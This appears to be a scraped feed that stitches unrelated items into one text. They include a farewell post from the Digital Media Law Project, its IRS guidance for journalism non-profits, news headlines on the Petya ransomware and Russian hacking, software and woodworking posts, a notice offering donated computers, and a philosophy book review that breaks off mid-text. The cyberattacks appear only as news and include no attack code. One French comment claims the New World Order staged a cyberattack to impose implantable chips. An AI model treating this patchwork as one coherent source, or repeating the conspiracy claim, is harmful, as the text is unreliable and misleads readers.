We have some important news to share from the Digital Media Law Project. After seven years of providing legal assistance to independent journalism through various methods, the DMLP will soon spin off its most effective initiatives and cease operation as a stand-alone project within the Berkman Center. The upcoming changes will ensure that our work continues in a robust and sustainable fashion, and so, while those of us here are a bit melancholy to see the end of an era, we are hopeful for what comes next.

I wanted to take this opportunity to look back over the history of the DMLP and its accomplishments, and to talk a bit about what the future will hold for our work.

The Beginning

In 2007, a group of scholars and attorneys at the Berkman Center for Internet & Society recognized a growing problem for online speech: namely, that a vast array of bloggers, citizen journalists, and other non-professional writers were publishing information on the Internet without a solid understanding of their rights and responsibilities under the law. Those without legal training or resources were unprepared for challenges such as defamation, privacy, and copyright claims, and often ran into pitfalls when dealing with issues such as corporate formation, contract negotiation, and development of website policies.

While the Berkman Center had been providing legal services to online ventures for several years through the Harvard Law School Cyberlaw Clinic, this growing need among independent publishers was simultaneously too widespread for the Clinic to address through its existing service model and too basic in many specific instances to present a valid case-by-case training opportunity for law students. A different approach was required.

Thus, in May 2007 the Berkman Center launched a new experiment: the "Citizen Media Law Project." The CMLP was an offshoot of the Cyberlaw Clinic, intended to address the lack of legal knowledge among bloggers and citizen journalists through the publication of online informational resources targeted at lay readers. The CMLP's primary resource was a detailed Legal Guide, which provided basic information on a broad array of media law and business law topics that online publishers could expect to encounter. The CMLP's Threats Database tracked legal challenges to online speech, such as lawsuits, police activity, and cease and desist letters, in order to address the lack of publicly available background information and primary source material relating to this type of activity.

The CMLP also engaged in a number of public outreach efforts, including organizing conferences, making speaking appearances, publishing its regular blog, and maintaining an online forum for discussion of legal issues affecting digital speech. These activities had the effect of raising the public profile of the project as an authoritative source of legal information.

The Online Media Legal Network

While these resources were successful and popular, there remained situations where citizen journalists and bloggers required more than just general legal information; rather, they needed the direct assistance of attorneys. Many members of the CMLP's audience were unable to afford counsel to support their legal rights, even if thanks to the CMLP's resources they had an understanding of those rights. Occasionally, CMLP staff members would represent a client directly in connection with narrowly defined legal questions; more commonly, the CMLP would appear as an amicus curiae in cases involving free speech issues. But this was insufficient to meet the needs of the CMLP's constituency.

Again, a broader solution was necessary, and in November 2009 the CMLP expanded its ability to support clients with the launch of its free attorney referral service, the Online Media Legal Network. The launch of the OMLN marked a quantum leap in the breadth and impact of the CMLP's services, placing individual online media clients in contact with skilled media and business attorneys throughout the United States willing to provide legal services on a pro bono or reduced fee basis. The network expanded dramatically as the CMLP promoted the concept of pro bono media law services, eventually reaching the point where the OMLN's member attorneys included hundreds of law firms, individual attorneys, and legal clinics, with members in all fifty states (plus the District of Columbia) and affiliations with international media law networks.

The "Early Warning System"

Throughout the growth of the project, the CMLP was building relationships with a wide array of partners, including the attorneys of the OMLN and their clients, non-profit organizations dedicated to journalism and online freedom, academic affiliates at other universities, and journalists and press organizations experimenting with online media. These individuals and organizations were eager to share their experiences with law in the digital age, and it became apparent that this feedback could provide critical information about breaking legal issues affecting online speech.

The CMLP began to treat these networks as an "early warning system" for legal questions worthy of attention. For example, at the end of 2011, the CMLP's networks alerted the project to issues at the Internal Revenue Service with respect to the agency's withholding of tax exemptions for non-profit journalism. Over the next three months, the CMLP investigated the issue and developed a tailored response in the form of an interactive resource that identified the challenges for journalism at the IRS, demystified the IRS's decision-making process, and provided guidance for meeting the agency's standards. The CMLP's IRS resource was extremely well received, and appears to have had a significant role in breaking up a backlog of applications at the agency.

Through the early warning system approach, the CMLP added greater flexibility to its operations, allowing us to identify new systemic imbalances in the law affecting online speech and to develop responses accordingly. This approach provided the CMLP with the guiding principle for its research, speaking appearances, and interventions in court cases.

Putting the Pieces Together

Over time, the CMLP organized its various efforts into five core initiatives: (1) the Legal Guide; (2) the Threats Database; (3) the Online Media Legal Network; (4) a "Research and Response" system to handle emerging issues; and (5) CMLP publishing through a series of online fora, including this blog. It was now easier to see how the activities of the project could function together to provide a coordinated set of legal resources for the public. When a client needed to speak to an attorney, they could be sent to the OMLN, but when their issues were not ripe enough to need a one-on-one consultation, the Legal Guide could serve their needs. The Threats Database provided attorneys and academics with neutral information about pending cases, but when legal issues became a problematic trend, the Research and Response initiative would develop more targeted responses. The CMLP blog changed in its tone from a forum for general commentary to a source for deeper insight and analysis of breaking issues at the intersection of law, technology and journalism.

It had also become clear that the original concept of the CMLP as serving a class of amateur bloggers and citizen journalists distinct from professional news outlets did not accurately reflect the nature of the online publishing environment. The CMLP had repeatedly encountered and assisted professional journalists who were nevertheless independent of traditional media outlets, either by choice or due to the economic disruption of the journalism industry. The project found that these clients had needs as significant as those of their "citizen" counterparts. The project recognized that distinctions between professional and citizen journalists were less important than analyzing the needs of online media as a whole.

The "Digital Media Law Project"

With this shift of focus, the project was able to respond to a range of important legal issues, including: First Amendment protection for the use of cameras to record the actions of public officials; legal constraints on newsgathering at the 2012 U.S. political conventions and the use of cameras at the 2012 national elections; the abuse of trademark law as a method of suppressing critical speech; the impact of legal regimes governing online intermediaries on data journalism and crowdsourced reporting; the use of digital technology to inform the public about judicial activity; systemic issues in the issuance of media credentials by government and private organizations; and more. Formalizing its new approach, the CMLP removed "Citizen" from its name in 2013, becoming the "Digital Media Law Project."

The Online Media Legal Network had by this time also emerged as an independent source of data for research purposes. By September 2013, the OMLN had placed its 500th client matter with a network attorney. In recognition of that milestone, the Digital Media Law Project conducted a comprehensive survey of its past clients and their legal needs, releasing that information in a report entitled The Legal Needs of Emerging Online Media: The Online Media Legal Network at 500 Referrals. This review of the issues facing a substantial sample of new and innovative online journalism ventures revealed that these clients' legal needs were in many respects not very different from those of traditional media organizations; while there were some distinctions, the primary difference lay in their ability to meet those needs.

The Future

Fundamentally, the Berkman Center is an incubation space that fosters experimentation in the study of the Internet and the development of tools and services that address the online world's many challenges. After seven years at the Berkman Center, the DMLP has grown from an experimental project that addressed the legal needs of an emerging class of bloggers and citizen journalists into a service organization that provides structured legal resources for the entire range of independent online journalism. We are extraordinarily proud of the work the DMLP has done, but now that the experimentation phase of the project is over, we have determined that the best path forward is to identify the most useful elements of the DMLP's operation, and make sure that they have permanent homes.

Some of our services - most notably our Legal Guide and Threats Database, along with our collection of research studies - will remain at the Berkman Center, reintegrated into the Cyberlaw Clinic where they will benefit from the support of law students and serve not only as an important resource for the public but as a tool to train young attorneys about legal issues vital to online communication. While our blog will cease publishing new posts, our archive of blog entries will remain available to the public. The Online Media Legal Network will find a new home outside of the Berkman Center with a non-profit organization that shares the DMLP's commitment to providing legal services to online media (we have a very exciting prospect lined up, but it's a bit early to report). While different aspects of the DMLP's work will continue in different places, we expect that the organizations taking on this work will work closely together to provide a coherent set of resources that address the diverse legal needs of online media.

These transitions will take place over the next few months, and the DMLP itself will wind up operations as an independent project as of September 30. As for those of us who work at the DMLP, we'll be moving on to other projects as well. I myself will be stepping back from my full-time role as the director of the DMLP as of June 30, but will be serving as a consultant to the Berkman Center through the transition period. Andy Sellars, our assistant director, will join the Cyberlaw Clinic as a Clinical Fellow and continue his work on freedom of speech and intellectual property issues in that context, including supervision of the Legal Guide and Threats Database in their new home. We don't know yet who will take custody of our office spider plant, Meiklejohn, but we're sure that the decision will be made by an electorate informed by the free flow of ideas.


It has been our pleasure to serve our constituency of online media projects and independent journalists over the last seven years, and those of us at the DMLP look forward to continuing this work in new ways. I would like to offer our gratitude to all of our colleagues at the Berkman Center (and especially the team at the Cyberlaw Clinic), our partners at other organizations, the volunteer attorneys of the Online Media Legal Network, our roll of contributing bloggers, and all of our donors and foundation supporters.

Most especially, I would like to thank: our founder and first director, David Ardia; our mentors and principal investigators, Phil Malone and Urs Gasser; Cyberlaw Clinic Managing Director Christopher Bavitz; my assistant director, Andy Sellars; and all of the other staff and interns of the CMLP/DMLP throughout the years: Sharo Atmeh, Julie Babayan, Lee Baker, Sam Bayard, Kristin Bergman, Reed Bienvenu, Rebekah Bradway, Arthur Bright, Jillian Button, Lauren Campbell, Tom Casazzone, Tuna Chatterjee, L.T. Ciaccio, Jason Crow, Alexandra Davies, Nicholas DeCoster, Jim Ernstmeyer, Vanessa Fazio, Courtney French, Helen Fu, Kelly Hoffman, Marshall Hogan, Kimberley Isbell, Olivia Jennings, Kyle Junik, Dan Kahn, Ryan Kane, Jane Kleiner, Erika Kweon, Frances Katz, Michael Lambert, Tim Lamoureux, Jason Liss, Matt Lovell, Katie Mapes, Ryan McGrady, Tabitha Messick, Natalie Nicol, Daniel Ostrach, Marc Pennington, Marina Petrova, Rich Quincy, Colin Rhinesmith, Amanda Rice, Caity Ross, David Russcol, Matt C. Sanchez, Alison Schary, Samantha Scheller, Natalie Senst, John Sharkey, Justin Silverman, Brittany Griffin Smith, Aaron Sokoloff, Lina Somait, Jillian Stonecipher, Konstantinos Stylianou, Tom Sullivan, Yixin Tang, Daniel Ungar, Caitlin Vogus, Miriam Weiler, and Stefani Wittenauer.

Addendum: The DMLP by the Numbers

Jeff Hermes has been the Director of the Digital Media Law Project since 2011, and has been proud of every minute.

Subject Area: 

          A New Approach to Helping Journalism Non-Profits at the IRS   

Today, the Digital Media Law Project has launched a new version of its resources for journalism organizations seeking a Section 501(c)(3) tax exemption for the IRS. As a project, we have been concerned with non-profit journalism from the beginning, providing informational resources for news ventures seeking to form as non-profits. Since the launch of our attorney referral service, the Online Media Legal Network, in late 2009, about a third of our clients have been non-profit journalism organizations; more have been individuals or for-profits interested in starting a non-profit news venture. We have worked with more than forty groups to find counsel to assist them in applying to the IRS for recognition of tax-exempt status.

But the path to tax-exempt status has not always run smooth. From 2010 to 2012, the IRS was reevaluating its standards for journalism organizations, causing these organizations to face long delays while struggling to stay afloat without an exemption in place. In fact, the now-infamous IRS "BOLO" lists flagged "newspaper entities" for special scrutiny [PDF] as of  February 2011. Several journalism applicants were questioned by the IRS about various aspects of their operation, without understanding why the IRS was interested in those issues -- and sometimes those questions seemed to verge into areas that should have been irrelevant under federal law. To help applicants satisfy IRS scrutiny, in April 2012 the DMLP released a detailed guide to the agency's decision-making process for granting tax exemptions to journalism non-profits.

In late 2012, it appeared that the logjam at the IRS was beginning to break, with a couple of high-profile applications accepted after delays of more than two years, and a steady stream of additional applications granted since then. And yet, the process remains complex, and there is substantial confusion about both how to obtain Section 501(c)(3) status and what that status allows you to do. For that reason, Eric Newton of the John S. and James L. Knight Foundation reached out to the DMLP and offered Knight's support for the development of a video debunking some of the more common myths and misconceptions, which we're pleased to present here (thanks also to Dan Jones, Digital Media Producer for the Berkman Center, and Ogmog Creative):

It has also become clear to us that the journalism organizations which have the easiest time finding a lawyer to help with a Section 501(c)(3) application, and succeed most frequently at the IRS, are those that take the time to study the 501(c)(3) process and the agency's standards before they apply. For that reason, we have launched a new collection of resources to help news organizations prepare to face the IRS, including: a checklist to help journalists decide if Section 501(c)(3) status is right for them; an updated section of our Legal Guide on the Section 501(c)(3) application process; our detailed guide to IRS decision-making for journalism non-profits; and an archive of successful application materials from news organizations that have obtained their tax-exempt status.

None of these resources is intended to allow a journalism non-profit to go it alone; with all that has happened at the IRS, the agency process is too tangled for a news venture to expect success without professional assistance. These resources will help journalism ventures to better understand what the agency is looking for, so that they can adjust their operations properly and be prepared to work with an attorney. 

Non-profit journalism has the potential to address public information needs that are simply not profitable for a for-profit news organization to cover -- and there is no better time to launch resources intended to help bring information of public importance to light than the beginning of Sunshine Week. And at 1 p.m. Eastern on April 10, 2014, the DMLP will be holding a one-hour online session open to the public where you can ask questions about these resources and the application process; connection details will be posted on the DMLP homepage on April 10, so be sure to come back then.

The Digital Media Law Project is based at the Berkman Center for Internet & Society at Harvard University. The DMLP produces a wide range of legal resources for independent online journalism projects and media ventures, including its multistate Legal Guide and topic-specific resources developed to respond to breaking legal issues affecting online speech.

Subject Area: 


          Petya ransomware attack hits India's Jawaharlal Nehru Port - Livemint   


Petya ransomware attack hits India's Jawaharlal Nehru Port
Concerns have been expressed earlier about India's infrastructure projects with power generation and transmission projects figuring on the terrorist threat list. The JNPT development assumes significance given India's Rs8 trillion investment plan until ...

and more »

          Commentaires sur Oui à la PMA pour toutes les femmes mais non à la GPA, ce que dit le rapport du pseudo-comité éthique par Gisèle   
Le danger n'est pas là ... J'ai regardé l'émission : C'est dans l'air . Je pense que le Nouvel Ordre Mondial est l'auteur de la dernière cyber attaque ( programmée ). Il passe à la vitesse supérieure pour arriver à son but : Diriger le monde et ses individus par la puce implantable . Tout le système informatique mondial sera réduit à néant . Il ne restera plus qu'un seul " opérateur " qui gèrera TOUT . Après les appareils connectés ...les cœurs connectés...puis les cerveaux connectés ( transhumanisme )... Tout cela n'était qu'une approche de ce qui nous attend vraiment . Quoique, la GPA sera aussi " informatisée " . L'" Ennemi " se croira vainqueur, pour un temps, sur la complète " récupération et la maîtrise " de la Sainte Création de Dieu . Mais le bien sera victorieux . Comme nous sommes humainement impuissants face à cette puissance maléfique, notre " mission" n'est que : Espérance , Foi, et Prière .
          Cyberattack: Ransomware hits Jawaharlal Nehru port operations in Mumbai - Hindustan Times   

Hindustan Times

Cyberattack: Ransomware hits Jawaharlal Nehru port operations in Mumbai
Hindustan Times
Officials said the attack has affected all software operations of Gateway Terminal India (GTI). Danish shipping giant AP Moller-Maersk, one of the affected entities globally, operates the GTI, which has a capacity to handle 1.8 million standard ...
The Latest: Port terminals in India affected by cyberattackLancasterOnline

all 53 news articles »

          Russia demands Washington explain after reports say US military hacked into Russian networks   
Russia demands Washington explain after reports say US military hacked into Russian networks Published time: 5 Nov, 2016 10:47 Russia expects Washington to provide an explanation after a report claimed that Pentagon cyber-offensive specialists have hacked into Russia’s power grids, telecommunications networks, and the Kremlin’s command systems for a possible sabotage. “If no official reaction from the American administration follows, […]
          17 essential tools to protect your online identity, privacy   
17 essential tools to protect your online identity, privacy From secure chips to anonymity services, here’s how to stay safe and private on the web By Roger A. Grimes Follow InfoWorld | Oct 31, 2016 6:08 AM PT Make no mistake: Professional and state-sponsored cybercriminals are trying to compromise your identity — either at home, to steal your money; or […]
          Try as It May, Trump Administration Can't Avoid Qatar Crisis - U.S. News & World Report   

U.S. News & World Report

Try as It May, Trump Administration Can't Avoid Qatar Crisis
U.S. News & World Report
Qatar's rift with its Arab neighbors emerges as the geopolitical crisis that the Trump administration just can't quit. June 28, 2017, at 5:03 p.m.. MORE. LinkedIn · StumbleUpon · Google +; Cancel. Try as It May, Trump Administration Can't Avoid Qatar ...
Qatar denies being hacked by Russia, accuses Gulf countries of cyberattackCBS News
How to negotiate the Qatar crisisNew York Daily News
How a 91-year-old imam came to symbolize feud between Qatar and its neighborsStars and Stripes
The Nation. -Gulf Times
all 246 news articles »

          Experts encourage more public awareness of Russian meddling   
WASHINGTON (AP) -- The United States will get hit again by Russian cyberattacks if the country doesn&apos;t pay closer attention and work more closely with European allies who are also victims, international elections experts warned on Wednesday....
          Firmy nie doceniają cyberubezpieczeń. PZU i AXA szykują nowa ofertę   
Na polskim rynku sprzedażą polis od ryzyka cybernetycznego zajmuje się pięciu ubezpieczycieli, ale w najbliższym czasie pojawią się kolejne dwie ofert. PZU zamierza sprzedawać cyberpolisy dla korporacji, a Axa dla średnich firm.
          Under Pressure, Western Tech Firms Bow to Russian Demands to Share Cyber Secrets   

Western technology companies, including Cisco, IBM and SAP, are acceding to demands by Moscow for access to closely guarded product security secrets, at a time when Russia has been accused of a growing number of cyber attacks on the West, a Reuters investigation has found.

          Chip deflector for Easy Wood Tools   

Old video, only 480p, that I dug up to play around with Cyberlink Power Director 12.

Chips from the square cutter tend to fly straight back at your fingers and if the wood is just the right hardness, will give you a thousand little paper cuts and that isn’t fun. Commercial versions seemed expensive for a piece of plexiglass so here is a simple shop made version. Changes I would make are bigger magnets and a shorter wood base. I keep meaning to cut these down.

          Shopping for video editing software   

I want video editing software, under $100, Win7. What does this have to do with woodworking? Nothing directly but it’s becoming more common to video projects and builds. Please share your experience with any of the following software or software you feel I’ve overlooked that meet the requirements (under $100, Win7 compatible). Also looking for comments on Sony MS 12 vs. 13. Thanks.

What I’ve tried: [updated]

Premiere 2.0: good but outdated, no HD video, new version is too expensive

VideoPad trial ($40 to buy): I liked it but feel it’s expensive for what it is. There is a free version that perhaps has a few more features than MSMM.

MSMM Microsoft Movie Maker ($free): Simple to use, intuitive, not compatible with 3gp files (my phone), output is questionable. Basically this works if all you want to do is string clips together with no audio or visual tweaks.

Jahshaka (open source), Blender (open source); both way above my paygrade.

Sony Movie Studio 13 ($30): Interface is bland and Win98-ish, bare bones editing software. A very minor step up from MSMM. Might was well use the free version of VideoPad.

Sony Movie Studio 13 Platinum ($80): Same as above but with a few more features and extras. Compared to Corel the interface is slightly clumsy but easy enough to use. Lacks auto correct functions for audio and visuals. Buttons are childishly large even in the advanced setting and color scheme choices are white which is the worst background for video editing and a medium grey. Blandness McBlandybland. However it is rock solid stable.

Cyberlink Power Director 12 ($62): Kind of a middle ground, good interface, works, very resource hungry. Uses 2X the memory of Sony MS just sitting open with no project. Only one of the bunch that slows my computer. The interface is like a slightly improved version of Sony MSP.

Corel Video Studio Pro X7 ($65): Beautiful modern interface, very intuitive, loads of extras (transitions, effects, etc). I initially had trouble editing audio but with help realized it was a mismatch between the source video and project settings, seems to be sorted now. There is also an Ultimate version which is only a few extra bucks and has a few more effects. This one is the most fun to use but maybe not quite as fast as Sony.

Pinnacle Studio 17 ($83): Decided not to install it. Recent reviews talk of a lengthy and very difficult installation process that takes hours; and reviews in general of the newer versions were not very favorable.

          WannaCry, Petrwrap  : pourquoi l'histoire se répète   
Les leçons de la précédente cyberattaque de grande ampleur n'ont pas eu le temps d'être appliquées que la nouvelle menace est apparue.
          La cyberattaque touche des géants des matières premières agricoles   
Plusieurs grandes entreprises du secteur, acteurs essentiels aux rouages du commerce mondial, ont été victimes de la vague mondiale de cyberattaques qui a bloqué mardi des milliers d'ordinateurs. Les géants du négoce agricole chinois Cofco et américain ADM en font partie, selon Bloomberg. Des...
          Media Round-Up: Trump’s First Foray into International Relations, NATO and Afghanistan   

From the global cyberattacks last week to the physical attacks in Manchester, England this week, the news cycle has been saturated with a non-stop barrage of recent assaults. The latest has unfolded just ahead of world leaders gathering at the new HQ of my old stomping grounds just outside of Brussels, Belgium.

Several issues [...]

          Cyber Attacks and the Fallout from Trump’s Russian Tête-à-Tête: This Week in the News   

In what turned out to be an uncannily well-timed post last week, I blogged about my testimony in front of the U.S. Senate Armed Services Committee on the need for cyber policy, strategy and organization. The next day, world governments were hit by a truly global cyberattack, the likes of which we’ve not previously seen.

          Mr. Stavridis Goes to Washington   

With pressure rising in D.C. over the investigation into the Russian interference in our elections and with nations like France, the Netherlands, and Germany looking to the U.S. as a test case to prepare for attempted foreign interference in their own elections, the issue of cybersecurity – and the lack thereof – has again raised [...]


Projet : Donation de matériels Informatique.

Att : Messieurs ; Mesdames

       Dans le cadre de sa campagne sous le thème « Computer for All », ITehC Technology fait don d’un certain nombre de Matériels Informatique de son Pack remis à neuf à toutes les Associations, ONG , Organisations Humanitaires et Caritatives, Institutions, Groupes, Communes, les PME, Ecoles , Universités, Centres de formation etc… qui seraient dans le besoin et dont les objectifs sont entre autres l’Education, le développement, Formations, Protection de l´environnement, La santé, la Jeunesse, la Valorisation des Tics. Nous portons à votre connaissance que ce sont des matériels qui ont à peine (1) an d´âge ce qui garantit leur très bon état.

Au nombre de ceux-ci, nous disposons:

- Des ordinateurs portables de marques (Dell, Acer, Hp, Sony etc…)
- Des disques durs externes
- Des ordinateurs Pentium 4 (Ecran LCD, Unités Centrales, Claviers, souris, logiciels)
- Des imprimantes Laser / Scanners Multi-Fonctions (Canon, Hp, Brother)
- 3 CyberBus ( Espace Public Informatique entièrement èquipés)

      Pour faire votre  demande trouvez en pièce jointe la lettre de demande (en Fichier Pdf) ; Veuillez prendre contact avec nous pour toutes autres informations.

ITehC Technology GmbH.
Hannes-Meyer-Platz 108
18106 Rostock
Tel: +49 176 8784 3941
Mail :
Web site :



          Lead Product Marketing Mgr - Cybersecurity Solutions - Dallas, TX   
As the largest communications company in the world, more than 120 million customers count on us every day to deliver the wireless, Internet, data and advertising services that fuel their businesses and connect them to their world. You will find yourself connecting...
          Ransomware Petya infekuje komputery w ponad 66 krajach. „Groźniejszy od WannaCry, będą kolejne ataki” (opinie)   
We wtorek nowy wirus typu ransomware Petya zablokował komputery firm i instytucji w ponad 66 krajach na świecie. Za odblokowanie dysku twardego cyberprzestępcy żądają 300 dolarów okupu. – Petya jest groźniejszy i bardziej dojrzały niż WannaCry, to nie jest amatorska robota, a podobnych ataków będzie coraz więcej – oceniają eksperci ds.cyberbezpieczeństwa z F-Secure i Fortinet.
          Haley Sorenson: 34DD sweet and sexy student at Indiana University   

Haley Sorenson is the Playboy Cybergirl of the Week for June 6 2011.
Born on 1991, Haley Sorenson is studying Graphic Design at Indiana University.

Haley Sorenson on Twitter:!/Haleywayne

          Widespread cyber attack hits major European companies   
Weeks after the WannaCry ransomware affected systems in over 100 countries, another major cyber attack is causing mass disruption across Europe, hitti...
          Cyber Freak Girl Masturbating In Front Of Webcam   
Watch Cyber Freak Girl Masturbating In Front Of Webcam at - best free online XXXPorn videos for you to enjoy.

Skeumorphs: σκεῦος (container or tool) + μορφή (shape)

Using plain shutterstock footage from mockups demonstrating different hand gestures dedicated to the use of hand held devices this video establishes a bridge with Ivonne Rainer’s Hand Movie (1966) when the choreographer was disabled from body movements and choreographed hand gestures.

Following on Katherine Hayles’* description of the skeumorphs phenomena this video demonstrates how our definition of concepts and artifacts that were once functional in the past is transitioning within a process of post-humanism where our daily gestures are an extension of embodied actions.

*How we became Posthuman (1999) - Katherine Hayle (p.17 Toward Embodied Virtuality)

- This video is part of the project TRANSCODING (more:

Cast: Daniel Pinheiro

Tags: katherine hayles, skeumorphs, cybernetic, posthuman, displacement, mediated gestures, hand, gestures, shutterstock, found footage, Ivonne Rainer and choreography

          Find The Best Supplier for Web Hosting   
Looking for the best web hosting provider's easy and difficult simultaneously. Easy because the Internet makes it very convenient, just a few clicks on Google, you'll instantly get a list of all web hosting services available anywhere. But it is also difficult at the same time, it can never be too sure if all these services are really good.

If your site runs popular then your site will likely be penalized for excessive use of bandwidth, which can mean that your website without notice.Even deleted Being a well-visited site, it is unlikely to generate more than one GB of bandwidth in the first years of operation. So goes 50gigabyte or more accounts is a total waste of money. Most of website hosting companies offer a variety of choice of bandwidth in their plans. So, that's exactly what the bandwidth regarding web hosting. You should plan for more bandwidth if you plan to use a lot of pictures, high volume e-mail account or audio / video on your site.

Another thing that should be taken into consideration is the cost of services. With the abundance of these services these days, you can not deal with the first supplier that is offered. You must consider all the others waiting on line. Making a quick comparison of prices and see which web hosting provider gives you more than you pay. Some of the finest Web hosting services out there are very affordable, without compromising the quality of your website.

Before you can really find the best supplier for web hosting on the web, you need to know things that these services can do for your business. A tangible benefit is that your public website on the cyber world, so it can be viewed online by users. Therefore, it is always best to entrust your online business with a company that has been for years and they are supported by their standing with former clients.

          #43: Sparks Nevada, Marshal on Mars, “Companeros”   

Starring Marc Evan Jackson as Sparks Nevada and Andy Daly as his faithful cyber-steed, Mercury. Also starring James Urbaniak, Craig Cackowski, Annie Savage, Colin Hanks, John DiMaggio, Hal Lublin, Busy Philipps, and Mark Gagliardi.

Recorded May 2, 2011.

          Term in bidding to    
Watching satellite TV on PC no longest requires you to buy those PCTV card game any longest. Unless you privation get a short linkage to cable TV or outer crockery at familial. However if you impoverishment to get satellite TV from your PC, after the solitary entity you may condition is to download a TV software. You will be correct and ripe in 2 written record dead flat.One of the unexceeded buy satellite TV on PC software system is the PC 2007 Elite Edition which is presently merchandising at $49.95, one clip arrival up fee. The information processing system outer TV software system comes with 3000 channels of intercontinental TV channels. This is the cheapest TV code I have previously owned that provides privileged competence TV. If you ask me, it's a quibble of a asking price given the vast listings of sport, films TV channels you get to monitor. Hooking up your electronic computer to satellite TV simply requires an cyberspace association and the computer code term.In bidding to view satellite TV on PC, your computing machine will call for to have at the smallest a Pentium 3 mainframe for easier display. A data processor beside vigour of almost 300 MHz is suggested for seamless TV access. The package building complex with literally all Windows programs near the optimal anyone WIN 2000 and XP. You demand not be afraid now since maximum computers are up to Pentium 4 and speeds of even 500 MHz. You may download the latest versions of Media recitalist for the ultimate feel in computing machine TV. Media musician too helps you perform functions right like you would your inbred TV.Post ads:Kissaluvs Diaper Lotion Potion 4 oz, Spray / The First Years Sit and Store Parent Bathing Seat and / Youngland Baby-girls Infant Animal Print Floral Border / Graco Sweet Snuggle Infant Soothing Swing, Oasis / Juvenile Solutions Thermobaby Bath Ring - Blue with Green / Taggies Bear Stacker / Clearblue Plus Pregnancy Test 3 Count / Tiny Love Gymini Monkey Island Activity Gym / Gerber Baby-Girls Newborn 5 Pack Solid Onesie / RoomMates RMK1158SCS Barbie Deco Peel & Stick Wall Decals / Similac SimplySmart On The Go Powder Cap / Bob Weather Shield for Single Sport Utility / Fisher-Price Discover 'n Grow Activity Bouncer / Learning Curve Dinosaur Train Collectible Dinosaur With / Plan Toys City Series Tanker TruckA DSL cyberspace connection has evidenced to be the most perfect although wireless is besides utile. When watching TV on the internet, you will have need of a few minutes on linking to the TV channels for what is titled buffering. After the pilot buffering, which takes 5-10 minutes; you will be able to timepiece outer TV seamlessly.
          Desi Cyber Cafe Security Cam Video   
Watch Desi Cyber Cafe Security Cam Video at - best free online XXXPorn videos for you to enjoy.
          Europe Reels After Second Major Cyber Attack In As Many Months   
The rapidly spreading computer worm appeared to borrow key features from last month’s ransomware attack.
          Cyber Attacks Cripple Companies Worldwide   
Petya is malware that makes computers inoperable by encrypting their hard drives and demands ransoms in exchange for a digital key to restore access.
          Sandy Ezekiel and the double standard.   
Last winter - a time of year when Margate never looks its best - another bloody foreigner with an unpronounceable name came to Margate. He brought a camera crew with him, and he was making a film about a flaky Russian single mother who had exchanged a crumbling tower block in Moscow for an equally crumbling one overlooking Dreamland, the kind of funfair of which nightmares are made. With a sub-plot that involved cyberporn and pre-teen vodka binges, it was clear that he wasn't making a holiday programme.

Which seemed like a gift for Sandy Ezekiel, Thanet's leading Tory, who has never tired of exposing how the Labour-led council has allowed the town to be overrun by refugees. Was not the film's very name, Last Resort, another nail in Margate's coffin? On Tuesday last week, councillor Ezekiel called for the resignation of the tourism chief, Iris Johnston, for allowing this "derogatory film" to be shot.

          Microsoft: Cyber-attack a ‘wake-up call’   
A cyber-attack that has hit 150 countries since Friday should be treated by governments around the world as a “wake-up call”, Microsoft says. It blamed governments for storing data on software vulnerabilities which could then be accessed by hackers. It says the latest virus exploits a flaw in Microsoft Windows identified by, and stolen from, US intelligence. There are fears of more “ransomware” attacks as people begin work on Monday, although few have been reported so far. Many firms have had experts working over the weekend to prevent new infections. The virus took control of users’ files and demanded $300
          Cyberinthian Ways   
Linda C Brigham

Although a hard-copy book and a hypertext essay hardly present us with apples and oranges, this particular pair troubles the work of comparison. This trouble is not simply a matter of form. Content-wise as well, Arkady Plotnitsky’s interdisciplinary exploration of poststructural metaphysics (or “meta-physics”) and David Kolb’s meditation on the textuality of philosophy relate to each other in a fashion at once too intimate and divergent. Like Blake’s Clod and Pebble from the Songs of Experience, they are contraries, or, to pick up the theme, “complementary.” As Blake would insist, though, it is through such contraries that progress happens.

Plotnitsky’s tremendously cerebral discussion of the poststructural resonance between quantum physics and deconstruction requires investment in a very unfriendly text, but pays off by the depth of its engagement. No mere review of paradoxical leitmotifs, Complementarity succeeds, although less directly than one might hope, in fleshing out that spooky sense of dislocation that is indeed the consequence of both the “hardest” science and the “highest” theory in the twentieth century - consequences too often approached as intellectual games. In the manner of George Bataille, who along with Derrida is the principal representative of philosophical “anti-epistemology,” Plotnitsky supports a sensibility that disrupts the foundation of all we take for granted - consciousness, identity, and knowledge - not only intellectually but experientially. Proofs and experiments can pose the antifoundational problematic, but they cannot generate the experience of antifoundationalism. French phenomenology, on the other hand, motivates a more corporeal sensibility; it sketches a kind of darting motion, a quick trick of the eye through which we can fake out phenomena and attain a noumenal shattering of all restrictions, all that makes sense - or to employ the economic metaphor that runs through Bataille and Derrida, and is taken up by Plotnitsky - makes cents, pays off, brings cognitive returns.

Yet this is a contained explosion. The context of quantum physics makes clear that border phenomena still service a rigor - if an uncanny one. Bataille and Derrida, in turn, do not foment a nihilistic chaos where anything goes any more than science does. Plotnitsky thoroughly explores the connection of Derrida and Bataille to Gödel and Heisenberg, both of whom highlight the structural vagueness limiting the knowable. There are limits - logically unsurpassable - to what we can ascertain about objects. More finely-calibrated instruments will not grant the capacity to measure the simultaneous magnitude and position of a photon, nor allow us to conclude whether this subatomic entity is a wave or a particle. Quantum physics’ undecidability highlights characteristics of Derrida’s “trace” - “neither a word nor a concept” - and the notion of “differance,” the simultaneous difference and deferral that describes the movement of words, signs - of traces, the tracks that constitute “clues” to “existences” whose appearance is simply the appearance of another trace, always pointing beyond itself. No better, more precise, more perfect language can improve the situation and finally render presence present. Plotnitsky’s interdisciplinarity underscores the fact that Derrida’s concerns are not merely textual matters, but so deeply embedded in something-or-other that the vastly different methods of physics and philosophy both tease them out.

Plotnitsky is less satisfactory on another crucial issue in quantum physics, however, a second spookier consequence of complementarity, a consequence that “complements” Heisenbergian-Gödelian undecidability and vagueness: the sense that the world is too complete; it contains Doppelgängers. One photon (or split photon) occupies two places at once; propositions and their contraries are both true. This is not vagueness, but its complement, duality, even multiplicity. While Plotnitsky chooses Niels Bohr as his principal exponent of quantum theory on the grounds that Bohr’s views reach decisively beyond vagueness and undecidability, the features of this “beyond” remain too vague. Others in quantum theory have been less reluctant. Contemporary physicist John Wheeler developed the Doppelgänger implication to the point of describing reality as consisting of many worlds, many realities; our sense of the uniqueness of world and the unity of consciousness is an illusion; we inhabit perhaps infinitely many worlds. Plotnitsky dismisses this consequence without discussion. It is, obviously, more counterintuitive than vagueness, but it is just as ineluctable.

